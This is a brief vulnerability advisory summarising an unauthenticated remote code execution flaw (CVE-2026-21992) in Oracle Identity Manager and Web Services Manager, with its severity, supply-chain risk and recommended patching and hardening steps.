Critical Unauthenticated RCE in Oracle Identity Manager (CVE-2026-21992) Threatens Enterprise IAM
What It Is — Oracle Identity Manager (OIM) and Oracle Web Services Manager contain a critical remote‑code‑execution flaw (CVE‑2026‑21992) that can be triggered without any authentication. The vulnerability scores 9.8 / 10 on the CVSS v3.1 scale, indicating a near‑certain compromise if exploited.
Exploitability — The flaw is remotely exploitable and requires no credentials; proof‑of‑concept code has been publicly disclosed, and threat actors are actively scanning for vulnerable deployments.
Affected Products — Oracle Identity Manager (all supported versions) and Oracle Web Services Manager (bundled with OIM).
TPRM Impact — As a core identity‑and‑access‑management platform, a breach in OIM can cascade to downstream SaaS applications, on‑premise systems, and partner ecosystems, creating a high‑impact supply‑chain risk.
Recommended Actions
- Deploy Oracle’s security patches for OIM and Web Services Manager immediately.
- Verify patch installation via Oracle’s advisory checklist and conduct post‑patch testing.
- Enforce network segmentation for IAM services and restrict inbound traffic to trusted sources.
- Enable comprehensive logging and real‑time monitoring for anomalous process execution.
- Review and rotate any privileged credentials that may have been stored in OIM.
Source: The Hacker News